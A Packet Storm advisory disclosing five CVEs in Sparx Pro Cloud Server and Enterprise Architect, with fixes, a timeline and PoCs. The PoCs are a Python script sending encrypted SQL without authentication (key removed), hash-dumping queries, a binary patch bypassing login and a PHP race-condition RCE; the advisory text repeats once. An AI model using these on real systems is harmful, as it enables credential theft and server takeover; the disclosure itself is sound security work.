9.3
/ 10
CRITICAL
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:N/VI:H/SI:N/VA:L/SA:N
Description
Multiple vulnerabilities in Sparx Pro Cloud Server PCS versions 6.1 and below and Sparx Enterprise Architect versions 17.1 and below allow a remote unauthenticated attacker to execute arbitrary SQL queries both read and write within any configured...
Basic Information
ID
PACKETSTORM:221993
Published
May 26, 2026 at 00:00
Affected Product
Affected Versions
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Multiple vulnerabilities in Sparx Pro Cloud Server and Enterprise Architect
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
General information
═══════════════════
Multiple vulnerabilities in Sparx Pro Cloud Server (PCS) versions <=
6.1 and Sparx Enterprise Architect versions <=17.1 allow a remote
unauthenticated attacker to execute arbitrary sql queries (both read
and write) within any configured database. In case where PCS is
installed with WebEA the vulnerabilities allow further for remote
unauthenticated code execution (RCE) within the web server context.
CVSSv4 chained score: *10.0 Critical*
(AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)
Fix
═══
Currently vendor *did not resolve* any of the CVEs. The PCS
authentication bypass and race condition seem to be easy to implement
and I hope vendor will release patches soon.
As a workaround it is best to isolate the PCS instances from internet
and untrusted networks. Create frequent backups and review access logs
if possible. You could also setup a proxy to limit the PCS
authentication bypass (dropping requests with no or wrong model query
parameter.
[Vulnerabilitiy #1] Sparx Pro Cloud Server SQL Command Execution
════════════════════════════════════════════════════════════════
CVE
───
CVE-2026-42096 - Broken Access Control in Sparx Pro Cloud Server
Affected versions
─────────────────
Sparx Pro Cloud Server versions <= 6.1 build 167
CVSSv4
──────
9.4 Critical
(CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)
Impact
──────
PCS works as a remote model for a thick client, running on user's
computers, called Enterprise Architect (EA). EA connects to PCS and
works with the exposed database by directly running SQL queries.
Besides user authentication (which is also vulnerable - see
vulnerability #2 below) there is no additional access control. Any low
privileged user can actually run any sql queries permitted by the
configured external database user. Usually the user configured is at
least having full access to the model database - thus any low
privileged user can actually destroy the whole model, retrieve and
change other user's password hashes and more.
The problem seems to be with legacy thick client EA architecture which
simply works on a database to manage all the model details.
Details
───────
The client (EA) is connecting to the PCS HTTP server. The server might
require authentication *if it is properly configured* - an admin can
check "Enable Security" in EA but still not select "Require a secure
and authenticated connection" in PCS configuration what results in *NO
SERVER SIDE authentication at all*.
Assuming the server side authentication is required the PCS verifies
the authentication according to configuration - e.g. login/password,
Active Directory or OpenID.
Then the EA client sends request to perform SQL queries on the
database in an ecrypted form but the whole encryption scheme is built
into the client EA binary (actually downloadable from the vendor
webside without any authentication - as trial version). The encryption
is symmetric using a key contained within the binary itself thus
simply this is not any security measure (security by obscurity).
An attacker can obtain the key and then *create and send custom SQL
queries to be performed by the database*.
PoC
───
Exploit: https://github.com/br0xpl/sparx_hack/blob/main/eacrypt.py (packet storm attached poc at bottom)
is a python script which exploits the SQL vulnerability by encrypting
any SQL command and sending it to the server. For security,
the real key is removed from the exploit code.
This script receives all users and their hashes from PCS:
┌────
│ python3 eacrypt.py http://${PCS_HOSTNAME} model "select * from t_secuser, t_xref where t_xref.Type='User Setting' and t_xref.Name ='SHA-256' and t_xref.Client=t_secuser.UserID"
└────
Solution
────────
It will be hard to introduce proper authorization for all types of SQL
queries - this would require to rewrite the logic to use some higher
abstraction API which can be properly authorized.
Until a proper authorized API will be provided a quick solution could
be at least to verify the SQL queries executed and block the most
dangerous like asking about other users' passwords and so on. Maybe a
query whitelist with limiting the view of some critical assets like
hashes.
For sure it should be transparently stated in the PCS and EA
documentation web page. Some integrators and admins are aware of this
risk (there are some topics on the forum mentioning that the model
security is not in fact security) but this *should be well described
in both product documentations* as a limitation and risk which needs
to be understood by clients and taken into consideration at an early
stage while designing a production system. Otherwise it poses a high
risk for any company using those products.
[Vulnerability #2] Sparx Pro Cloud Server Authentication Bypass
═══════════════════════════════════════════════════════════════
CVE
───
CVE-2026-42097 - Authentication Bypass in Sparx Pro Cloud Server
Affected versions
─────────────────
Sparx Pro Cloud Server versions <= 6.1 build 167
CVSSv4
──────
9.2 Critical
(CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)
Impact
──────
An attacker can *omit PCS authentication* and e.g. combined with the
previous vulnerability be able to remotely execute arbitrary SQL
commands (read and write) *without authentication*.
Details
───────
It seems that PCS requires authentication based on requested URL. EA
clients sending the encrypted SQL query to PCS are using an url which
looks as follows:
┌────
│ https://${PCS_SERVER_HOSTNAME}/SparxCloudLink.sseap?model=${MODEL_NAME}
└────
PCS seems to look at the URL and decides how to authenticate the
request. Unfortunately the SQL command query sends a POST request with
a binary blob where the model name is defined one more time and this
is the value that is further used by PCS to execute the query.
Thus an attacker can simply omit the model query parameter and send
the model name only in the binary blob in both TLS and non-TLS ports
and the query will be executed even thought there was no
authentication.
PoC
───
To quickly verify compare the authenticated response for a request:
┌────
│ curl 'https://${PCS_HOSTNAME}/SparxCloudLink.sseap?model=${MODEL_NAME}' -X POST -vvv --data 'whatever' -k
└────
which responds 401 Access Denied to response of a request without the
query param:
┌────
│ curl 'https://${PCS_HOSTNAME}/SparxCloudLink.sseap' -X POST -vvv --data 'whatever' -k
└────
which responds 500 Internal Server Error.
To proof this properly use the python code which exploits the #1
SQL vulnerability and uses the URL without model query parameter to
omit the authentication.
Solution
────────
Make a single parameter pointing the model (either in the blob or in
query param) and hook authentication and query logic on the same
parameter.
[Vulnerability #3] Sparx Enterprise Architect Authorization Bypass
══════════════════════════════════════════════════════════════════
CVE
───
CVE-2026-42098 - Authorization Bypass in Sparx Enterprise Architect
Affected versions
─────────────────
Sparx Enterprise Architect versions <= 17.1
CVSSv4
──────
7.7 High
(CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)
Impact
──────
Sparx Enterprise Architect software has a security feature which can
be enabled. When enabled the users can be limited to perform only some
actions by roles but this is not a real security measure as it can be
easily bypassed.
*Any authenticated user can actually perform any action on the model*
including deletion, stealing of other users' passwords and many
others. This *includes configurations with Pro Cloud Server* where
vendor advertises that PCS brings high level of security for the
model:
Robust security features are designed to protect sensitive
model information, *including role-based access control*,
encryption, authentication mechanisms and audit trails.
source: <https://www.sparxsystems.eu/pro-cloud-server/>
Details
───────
This vulnerability, most probably, is a result of the legacy thick
client architecture described in the vulnerability #1.
The EA documentation states briefly that the security is not a real
security:
The Security system in Enterprise Architect is designed to
facilitate collaboration, *not as a barrier to incursion*.
source:
<https://sparxsystems.com/enterprise_architect_user_guide/17.1/guide_books/tools_ba_security.html>
but right below it suggests that model assets should be secured:
The information contained in the Repository is a valuable
organizational asset that needs to be maintained and
secured as such. The asset must be protected from both
*intentional* and inadvertent compromises of content. The
Security system allows update functions to be restricted
to a set of users or groups with the appropriate defined
permission. Packages, elements and diagrams can be locked
by users, preventing others from updating them.
source:
<https://sparxsystems.com/enterprise_architect_user_guide/17.1/guide_books/tools_ba_security.html>
Unfortunately the current design is not protecting against intentional
compromises of content. An attacker can modify the EA client behavior
(e.g. using a debugger) to login in as any other user or administrator
- then it is possible to do every possible change to the repository.
PoC
───
To show how it works it is enough to patch the binary to change the
logic and accept all incorrect passwords and reject correct ones. For
the file version 17.1.0.1714 of EA.exe (md5sum:
69dfe7b98d1fc156d15d8aeff726cfce) the following would patch the logic:
┌────
│ printf '\x84' | dd of=EA.exe bs=1 seek=$((0x34657B2)) conv=notrunc
└────
Then run the patched exe and try to login to local model with
different password. It also works obviously for cloud models which do
not require server HTTP authentication or when using the "Login as
different user option".
Solution
────────
The way security works for EA should be properly and transparently
presented in the EA documentation and installation notes. The sentence
quoted above is not enough and can be easily misinterpreted by many
users leading to vulnerabilities.
Also it should be explained that even when using PCS after
authentication there is no authorization until visibility levels are
enabled which are working per whole database manager not user - so in
fact there is no user based RBAC but rather database manager RBAC what
is much more coarse grained then per user roles access control.
In terms of combination of EA and PCS it is possible to secure the
design by e.g. following the recommendations proposed in vulnerability
#1.
[Vulnerability #4] Sparx Pro Cloud Server WebEA Remote Code Execution
═════════════════════════════════════════════════════════════════════
CVE
───
CVE-2026-42099 - Race Condition in Sparx Pro Cloud Server
Affected versions
─────────────────
Sparx Pro Cloud Server versions <= 6.1 build 167
CVSSv4
──────
9.0 Critical
(CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)
Impact
──────
PCS configured with WebEA PHP application allows for remote command
execution using the /data_api/dl_internal_artifact.php endpoint. This
URL is used by WebEA to download content of a internal artifact. A
remote attacker having access to the PCS repository is able to inject
a malicious php file into the model and then request its download.
The vulnerable dl_internal_artifact.php allows the remote attacker to
create temporary php file and concurrently execute it before it gets
deleted.
The remote attacker can use this attack to gain execution in context
of WebEA which allows to further explore the WebEA and PCS server
configuration.
Details
───────
The vulnerable file first downloads the properties of the object
pointed by guid parameter:
┌────
│ 49 include('get_properties.php');
│ 50 $sObjectName = SafeGetArrayItem1Dim($aCommonProps, 'name');
│ 51 $sDocContent = SafeGetArrayItem1Dim($aDocument, 'content');
│ 52 $sExtension = SafeGetArrayItem1Dim($aDocument, 'extension');
│ 53 $sFileName = $sObjectName;
│ 54 $iExtLength = strlen($sExtension);
│ 55 $sObjectNameEnd = substr($sObjectName, -$iExtLength);
│ 56 if($sExtension !== $sObjectNameEnd)
│ 57 {
│ 58 $sFileName = $sObjectName . $sExtension;
│ 59 }
└────
Listing 1: WebEA/data_api/dl_internal_artifact.php
Then the loaded content is saved in current location (__DIR__) and the
evaluated above filename and then it is returned:
┌────
│ 77 ...
│ 78 function DownloadFromTempFile($sFileName, $sDocContent)
│ 79 {
│ 80 $decoded = base64_decode($sDocContent);
│ 81 file_put_contents($sFileName, $decoded);
│ 82 if (file_exists($sFileName)) {
│ 83 header('Content-Description: File Transfer');
│ 84 header('Content-Type: application/octet-stream');
│ 85 header('Content-Disposition: attachment; filename="'.basename($sFileName).'"');
│ 86 header('Expires: 0');
│ 87 header('Cache-Control: must-revalidate');
│ 88 header('Pragma: public');
│ 89 header('Content-Length: ' . filesize($sFileName));
│ 90 readfile($sFileName);
│ 91 unlink($sFileName);
│ 92 exit;
│ 93 }
│ 94 }
│ 95 ...
└────
Listing 2: WebEA/data_api/dl_internal_artifact.php
The attacker having access to the repository fully controls both: 1)
the filename and 2) the contents. Thus it is possible to simply write
a .php file in the current directory.
The script however deletes the file in line 91 above. However, there
is a race condition - if the readfile takes longer to transmit (large
file size, slow tcp client) then the readfile will simply block
waiting for the client to receive. At the same time the file can be
requested in another tcp connection executing the exploit php code.
PoC
───
1. Using vulnerabilities #1 and #2 attacker can create the artifact in
the target repository:
┌────
│ python3 eacrypt.py https://${PCS_HOSTNAME} ${MODEL_NAME} "insert into t_object (object_id, object_type, name, author, style, ea_guid) values (100000, 'Artifact', 'poc.php', 'Admin', 'ExtDoc=1;', '{\!A}8889BA10-6178-4047-9273-37FC75B0FCF6{\!C}')"
│ # insert the document (zipped php file simply printing "Test") as "poc.php"
│ python3 eacrypt.py https://${PCS_HOSTNAME} ${MODEL_NAME} "insert into t_document (docid, docname, elementid, elementtype, bincontent, doctype, author, isactive, sequence) values ('{\!A}8889BA10-6178-4047-9273-37FC75B0FCF6{\!C}', 'poc.php', '{\!A}8889BA10-6178-4047-9273-37FC75B0FCF6{\!C}', '.php', cast(x'504b03041400000008005497575bfe1a3fd00c0300006141030007001c007374722e6461745554090003bf5efa68ce5efa6875780b000104e803000004e8030000edcdb10980301000c0fee1e750d3b8809825b28104ec0ce8fe388556770bdc56c73932fa715ef3d4fafd4c4bc65a32daf7241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482492df92b266d43de305504b01021e031400000008005497575bfe1a3fd00c03000061410300070018000000000001000000a481000000007374722e6461745554050003bf5efa6875780b000104e803000004e8030000504b050600000000010001004d0000004d0300000000' as blob sub_type binary), 'ExtDoc', 'Admin', 177, 0)"
└────
2. In one terminal start to query the poc.php file until it is
executed:
┌────
│ while [ true ]; do curl 'https://${WEBEA_HOSTNAME}/data_api/poc.php' -k; done 2> /dev/null | grep Test
└────
3. While the above command is executing in another terminal or logged
in browser window open the following URL:
┌────
│ https://${WEBEA_HOSTNAME}/data_api/dl_internal_artifact.php?guid=el_%7B8889BA10-6178-4047-9273-37FC75B0FCF6%7D&modelno=1
└────
4. In the terminal from step 2 there should be "Test" printed (proof
that php code executed), if not try to repeat step 3.
Solution
────────
The solution should be to return the content without saving it to
disk. If necessary it should be saved in a temporary folder not
accesible within webserver. Also the temporary file does not have to
have the same name as the name returned - it should not use the
filename from the model (controlled by user).
[Vulnerability #5] Sparx Pro Cloud Server Deny of Service in the /SparxCloudLink.sseap endpoint
═══════════════════════════════════════════════════════════════════════════════════════════════
CVE
───
CVE-2026-42100 - DoS in Sparx Pro Cloud Server
Affected versions
─────────────────
Sparx Pro Cloud Server versions <= 6.1 build 167
CVSSv4
──────
8.7 High
(CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N)
Impact
──────
An attacker can make the PCS service exit causing a Deny of Service.
The error was not deeply analyzed but it is possible that this or
similar buffer operation bugs could be exploited to a code execution.
Details
───────
Sending an SQL query with started escape sequence "{" without the
finishing curly brace causes the PCS service to terminate
unexpectedly.
PoC
───
Run the following SQL query:
┌────
│ python3 eacrypt.py http://${PCS_HOSTNAME} model "select {asd"
└────
The script will finish with "Connection reset by peer" error and the
service will exit with the following message:
[FATAL]: ————————————– [FATAL]: Thread 112 Unrecoverable
error
Solution
────────
Correct the handling of escape sequencing and parsing the SQL query
for proper boundary checks. Recheck that there are no potential buffer
overflow errors within the logic.
Timeline
════════
• 09.2025 - Vulnerabilities identified.
• 21.11.2025 - Sending details to CERT Polska to contact vendor.
• 25.11.2025 - First contact of CERT Polska with Vendor.
• 06.02.2026 - First Vendor reply with standard first-support-line
questions about products, versions etc.
• 14.04.2026 - Because of lack of progress Vendor was informed about
planned publication according to the procedure - within 90 days of
providing details.
• 19.05.2026 - CVEs published.
References
══════════
• <https://sploit.tech/2026/05/19/Sparx-Enterprise-Architect-PCS.html>
- details with video
• <https://efigo.pl/blog/CVE-2026-42096/> - summary
• <https://cert.pl/en/posts/2026/05/CVE-2026-42096> - advisory
• <https://sparxsystems.com/products/procloudserver/> - product’s
website
Credits
═══════
Author: Blazej Adamczyk (br0x) | <https://sploit.tech/>
Team: Efigo <https://efigo.pl/>
--- packet storm attached poc ---
import sys
import requests
import urllib3
import pycurl
from io import BytesIO
import zipfile
k="HERE_SHOULD_BE_THE_KEY"
x=[4, 2, 0, 6, 3, 1, 5]
xr=[x.index(i) for i in range(7)]
def mangle(s:str) -> str:
o=bytearray(s,"utf-8")
for i in range((len(s) // 7)*7):
o[i]=ord(s[((i // 7)*7)+xr[i % 7]])
return o.decode("utf-8")
def demangle(s:str) -> str:
o=bytearray(s,"utf-8")
for i in range((len(s) // 7)*7):
o[i]=ord(s[((i // 7)*7)+x[i % 7]])
return o.decode("utf-8")
def custom_decode(ciphertext: str, key: str) -> str:
"""
Decode using the custom cipher.
ciphertext : input string (Unicode)
key : key string (Unicode)
Returns plaintext string (printable ASCII 0x20–0x7E).
"""
output_chars = []
length = len(ciphertext)
key_len = len(key)
for i, ch in enumerate(ciphertext):
# load plaintext character as integer
c_val = ord(ch)
# derive key value (word from key string)
k_val = ord(key[(i+length) % key_len])
c_val = c_val - 0x20 - k_val + 0x40
if c_val<0x20:
c_val=c_val+0x5E
if c_val>(0x5E+0x20):
c_val=c_val-0x5E
output_chars.append(chr(c_val))
return "".join(output_chars)
def custom_encode(plaintext: str, key: str) -> str:
"""
Encode plaintext using the custom cipher.
plaintext : input string (Unicode)
key : key string (Unicode)
Returns encoded string (printable ASCII 0x20–0x7E).
"""
output_chars = []
length = len(plaintext)
key_len = len(key)
for i, ch in enumerate(plaintext):
# load plaintext character as integer
c_val = ord(ch)
# subtract 0x40
c_val = c_val - 0x40
# derive key value (word from key string)
k_val = ord(key[(i+length) % key_len])
# add key
total = k_val + c_val
# modulo 94
total = total % 0x5E
# add 0x20 (ensures printable ASCII)
encoded_val = total + 0x20
# append encoded character
output_chars.append(chr(encoded_val))
return "".join(output_chars)
def test(debug_type, debug_msg):
print("debug(%d): %s" % (debug_type, debug_msg))
if __name__ == "__main__":
if (len(sys.argv)!=4):
print("Usage: "+sys.argv[0]+" URL_without_sparxcloudlink_path model_name sql")
exit(-1)
host = sys.argv[1]
repo = sys.argv[2]
sqli = sys.argv[3]
#url = "%s/SparxCloudLink.sseap?model=%s"%(host,repo)
url = "%s/SparxCloudLink.sseap"%(host)
print(url)
sqli = str(len(sqli))+":"+sqli
fill="+d1XL|@"
sqli += fill[-(7-(len(sqli)%7)):]
print (sqli)
#sqli="23:Select * from t_secuser|@"
ret=custom_encode(mangle(sqli),k)
binary=bytes([0,0,0,1,0,0])
binary+=bytes.fromhex('%04X'%(len(ret)*2+66))
binary+=bytes.fromhex('%04X'%(len(repo)))
for c in repo:
binary+=bytes([ord(c),0])
binary+=bytes([0,1,0,0])
binary+=bytes.fromhex('%04X'%(len(ret)))
for c in ret:
binary+=bytes([ord(c),0])
c=pycurl.Curl()
c.setopt(pycurl.URL, url)
c.setopt(pycurl.READDATA, BytesIO(binary))
c.setopt(pycurl.POSTFIELDSIZE, len(binary))
c.setopt(pycurl.POST, 1)
c.setopt(pycurl.VERBOSE, 1)
c.setopt(pycurl.DEBUGFUNCTION, test)
c.setopt(pycurl.HTTPHEADER, ['Content-Type: ' , 'Accept: ', 'EnterpriseArchitect-Build: 1527' , 'EnterpriseArchitect-InternalBuild: 481' , 'User-Agent: Enterprise Architect/15.1.1527' , 'Connection: Keep-Alive' , 'Cache-Control: no-cache'])
body = BytesIO()
c.setopt(pycurl.WRITEDATA, body)
c.setopt(pycurl.SSL_VERIFYPEER, 0)
c.setopt(pycurl.SSL_VERIFYHOST, 0)
c.perform()
c.close()
try:
z = zipfile.ZipFile(body)
print(z.read('query.xml').decode('utf-8'))
except zipfile.BadZipFile:
sys.stdout.buffer.write(body.getvalue())
Multiple vulnerabilities in Sparx Pro Cloud Server and Enterprise Architect
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
General information
═══════════════════
Multiple vulnerabilities in Sparx Pro Cloud Server (PCS) versions <=
6.1 and Sparx Enterprise Architect versions <=17.1 allow a remote
unauthenticated attacker to execute arbitrary sql queries (both read
and write) within any configured database. In case where PCS is
installed with WebEA the vulnerabilities allow further for remote
unauthenticated code execution (RCE) within the web server context.
CVSSv4 chained score: *10.0 Critical*
(AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)
Fix
═══
Currently vendor *did not resolve* any of the CVEs. The PCS
authentication bypass and race condition seem to be easy to implement
and I hope vendor will release patches soon.
As a workaround it is best to isolate the PCS instances from internet
and untrusted networks. Create frequent backups and review access logs
if possible. You could also setup a proxy to limit the PCS
authentication bypass (dropping requests with no or wrong model query
parameter.
[Vulnerabilitiy #1] Sparx Pro Cloud Server SQL Command Execution
════════════════════════════════════════════════════════════════
CVE
───
CVE-2026-42096 - Broken Access Control in Sparx Pro Cloud Server
Affected versions
─────────────────
Sparx Pro Cloud Server versions <= 6.1 build 167
CVSSv4
──────
9.4 Critical
(CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)
Impact
──────
PCS works as a remote model for a thick client, running on user's
computers, called Enterprise Architect (EA). EA connects to PCS and
works with the exposed database by directly running SQL queries.
Besides user authentication (which is also vulnerable - see
vulnerability #2 below) there is no additional access control. Any low
privileged user can actually run any sql queries permitted by the
configured external database user. Usually the user configured is at
least having full access to the model database - thus any low
privileged user can actually destroy the whole model, retrieve and
change other user's password hashes and more.
The problem seems to be with legacy thick client EA architecture which
simply works on a database to manage all the model details.
Details
───────
The client (EA) is connecting to the PCS HTTP server. The server might
require authentication *if it is properly configured* - an admin can
check "Enable Security" in EA but still not select "Require a secure
and authenticated connection" in PCS configuration what results in *NO
SERVER SIDE authentication at all*.
Assuming the server side authentication is required the PCS verifies
the authentication according to configuration - e.g. login/password,
Active Directory or OpenID.
Then the EA client sends request to perform SQL queries on the
database in an ecrypted form but the whole encryption scheme is built
into the client EA binary (actually downloadable from the vendor
webside without any authentication - as trial version). The encryption
is symmetric using a key contained within the binary itself thus
simply this is not any security measure (security by obscurity).
An attacker can obtain the key and then *create and send custom SQL
queries to be performed by the database*.
PoC
───
Exploit: https://github.com/br0xpl/sparx_hack/blob/main/eacrypt.py (packet storm attached poc at bottom)
is a python script which exploits the SQL vulnerability by encrypting
any SQL command and sending it to the server. For security,
the real key is removed from the exploit code.
This script receives all users and their hashes from PCS:
┌────
│ python3 eacrypt.py http://${PCS_HOSTNAME} model "select * from t_secuser, t_xref where t_xref.Type='User Setting' and t_xref.Name ='SHA-256' and t_xref.Client=t_secuser.UserID"
└────
Solution
────────
It will be hard to introduce proper authorization for all types of SQL
queries - this would require to rewrite the logic to use some higher
abstraction API which can be properly authorized.
Until a proper authorized API will be provided a quick solution could
be at least to verify the SQL queries executed and block the most
dangerous like asking about other users' passwords and so on. Maybe a
query whitelist with limiting the view of some critical assets like
hashes.
For sure it should be transparently stated in the PCS and EA
documentation web page. Some integrators and admins are aware of this
risk (there are some topics on the forum mentioning that the model
security is not in fact security) but this *should be well described
in both product documentations* as a limitation and risk which needs
to be understood by clients and taken into consideration at an early
stage while designing a production system. Otherwise it poses a high
risk for any company using those products.
[Vulnerability #2] Sparx Pro Cloud Server Authentication Bypass
═══════════════════════════════════════════════════════════════
CVE
───
CVE-2026-42097 - Authentication Bypass in Sparx Pro Cloud Server
Affected versions
─────────────────
Sparx Pro Cloud Server versions <= 6.1 build 167
CVSSv4
──────
9.2 Critical
(CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)
Impact
──────
An attacker can *omit PCS authentication* and e.g. combined with the
previous vulnerability be able to remotely execute arbitrary SQL
commands (read and write) *without authentication*.
Details
───────
It seems that PCS requires authentication based on requested URL. EA
clients sending the encrypted SQL query to PCS are using an url which
looks as follows:
┌────
│ https://${PCS_SERVER_HOSTNAME}/SparxCloudLink.sseap?model=${MODEL_NAME}
└────
PCS seems to look at the URL and decides how to authenticate the
request. Unfortunately the SQL command query sends a POST request with
a binary blob where the model name is defined one more time and this
is the value that is further used by PCS to execute the query.
Thus an attacker can simply omit the model query parameter and send
the model name only in the binary blob in both TLS and non-TLS ports
and the query will be executed even thought there was no
authentication.
PoC
───
To quickly verify compare the authenticated response for a request:
┌────
│ curl 'https://${PCS_HOSTNAME}/SparxCloudLink.sseap?model=${MODEL_NAME}' -X POST -vvv --data 'whatever' -k
└────
which responds 401 Access Denied to response of a request without the
query param:
┌────
│ curl 'https://${PCS_HOSTNAME}/SparxCloudLink.sseap' -X POST -vvv --data 'whatever' -k
└────
which responds 500 Internal Server Error.
To proof this properly use the python code which exploits the #1
SQL vulnerability and uses the URL without model query parameter to
omit the authentication.
Solution
────────
Make a single parameter pointing the model (either in the blob or in
query param) and hook authentication and query logic on the same
parameter.
[Vulnerability #3] Sparx Enterprise Architect Authorization Bypass
══════════════════════════════════════════════════════════════════
CVE
───
CVE-2026-42098 - Authorization Bypass in Sparx Enterprise Architect
Affected versions
─────────────────
Sparx Enterprise Architect versions <= 17.1
CVSSv4
──────
7.7 High
(CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)
Impact
──────
Sparx Enterprise Architect software has a security feature which can
be enabled. When enabled the users can be limited to perform only some
actions by roles but this is not a real security measure as it can be
easily bypassed.
*Any authenticated user can actually perform any action on the model*
including deletion, stealing of other users' passwords and many
others. This *includes configurations with Pro Cloud Server* where
vendor advertises that PCS brings high level of security for the
model:
Robust security features are designed to protect sensitive
model information, *including role-based access control*,
encryption, authentication mechanisms and audit trails.
source: <https://www.sparxsystems.eu/pro-cloud-server/>
Details
───────
This vulnerability, most probably, is a result of the legacy thick
client architecture described in the vulnerability #1.
The EA documentation states briefly that the security is not a real
security:
The Security system in Enterprise Architect is designed to
facilitate collaboration, *not as a barrier to incursion*.
source:
<https://sparxsystems.com/enterprise_architect_user_guide/17.1/guide_books/tools_ba_security.html>
but right below it suggests that model assets should be secured:
The information contained in the Repository is a valuable
organizational asset that needs to be maintained and
secured as such. The asset must be protected from both
*intentional* and inadvertent compromises of content. The
Security system allows update functions to be restricted
to a set of users or groups with the appropriate defined
permission. Packages, elements and diagrams can be locked
by users, preventing others from updating them.
source:
<https://sparxsystems.com/enterprise_architect_user_guide/17.1/guide_books/tools_ba_security.html>
Unfortunately the current design is not protecting against intentional
compromises of content. An attacker can modify the EA client behavior
(e.g. using a debugger) to login in as any other user or administrator
- then it is possible to do every possible change to the repository.
PoC
───
To show how it works it is enough to patch the binary to change the
logic and accept all incorrect passwords and reject correct ones. For
the file version 17.1.0.1714 of EA.exe (md5sum:
69dfe7b98d1fc156d15d8aeff726cfce) the following would patch the logic:
┌────
│ printf '\x84' | dd of=EA.exe bs=1 seek=$((0x34657B2)) conv=notrunc
└────
Then run the patched exe and try to login to local model with
different password. It also works obviously for cloud models which do
not require server HTTP authentication or when using the "Login as
different user option".
Solution
────────
The way security works for EA should be properly and transparently
presented in the EA documentation and installation notes. The sentence
quoted above is not enough and can be easily misinterpreted by many
users leading to vulnerabilities.
Also it should be explained that even when using PCS after
authentication there is no authorization until visibility levels are
enabled which are working per whole database manager not user - so in
fact there is no user based RBAC but rather database manager RBAC what
is much more coarse grained then per user roles access control.
In terms of combination of EA and PCS it is possible to secure the
design by e.g. following the recommendations proposed in vulnerability
#1.
[Vulnerability #4] Sparx Pro Cloud Server WebEA Remote Code Execution
═════════════════════════════════════════════════════════════════════
CVE
───
CVE-2026-42099 - Race Condition in Sparx Pro Cloud Server
Affected versions
─────────────────
Sparx Pro Cloud Server versions <= 6.1 build 167
CVSSv4
──────
9.0 Critical
(CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)
Impact
──────
PCS configured with WebEA PHP application allows for remote command
execution using the /data_api/dl_internal_artifact.php endpoint. This
URL is used by WebEA to download content of a internal artifact. A
remote attacker having access to the PCS repository is able to inject
a malicious php file into the model and then request its download.
The vulnerable dl_internal_artifact.php allows the remote attacker to
create temporary php file and concurrently execute it before it gets
deleted.
The remote attacker can use this attack to gain execution in context
of WebEA which allows to further explore the WebEA and PCS server
configuration.
Details
───────
The vulnerable file first downloads the properties of the object
pointed by guid parameter:
┌────
│ 49 include('get_properties.php');
│ 50 $sObjectName = SafeGetArrayItem1Dim($aCommonProps, 'name');
│ 51 $sDocContent = SafeGetArrayItem1Dim($aDocument, 'content');
│ 52 $sExtension = SafeGetArrayItem1Dim($aDocument, 'extension');
│ 53 $sFileName = $sObjectName;
│ 54 $iExtLength = strlen($sExtension);
│ 55 $sObjectNameEnd = substr($sObjectName, -$iExtLength);
│ 56 if($sExtension !== $sObjectNameEnd)
│ 57 {
│ 58 $sFileName = $sObjectName . $sExtension;
│ 59 }
└────
Listing 1: WebEA/data_api/dl_internal_artifact.php
Then the loaded content is saved in current location (__DIR__) and the
evaluated above filename and then it is returned:
┌────
│ 77 ...
│ 78 function DownloadFromTempFile($sFileName, $sDocContent)
│ 79 {
│ 80 $decoded = base64_decode($sDocContent);
│ 81 file_put_contents($sFileName, $decoded);
│ 82 if (file_exists($sFileName)) {
│ 83 header('Content-Description: File Transfer');
│ 84 header('Content-Type: application/octet-stream');
│ 85 header('Content-Disposition: attachment; filename="'.basename($sFileName).'"');
│ 86 header('Expires: 0');
│ 87 header('Cache-Control: must-revalidate');
│ 88 header('Pragma: public');
│ 89 header('Content-Length: ' . filesize($sFileName));
│ 90 readfile($sFileName);
│ 91 unlink($sFileName);
│ 92 exit;
│ 93 }
│ 94 }
│ 95 ...
└────
Listing 2: WebEA/data_api/dl_internal_artifact.php
The attacker having access to the repository fully controls both: 1)
the filename and 2) the contents. Thus it is possible to simply write
a .php file in the current directory.
The script however deletes the file in line 91 above. However, there
is a race condition - if the readfile takes longer to transmit (large
file size, slow tcp client) then the readfile will simply block
waiting for the client to receive. At the same time the file can be
requested in another tcp connection executing the exploit php code.
PoC
───
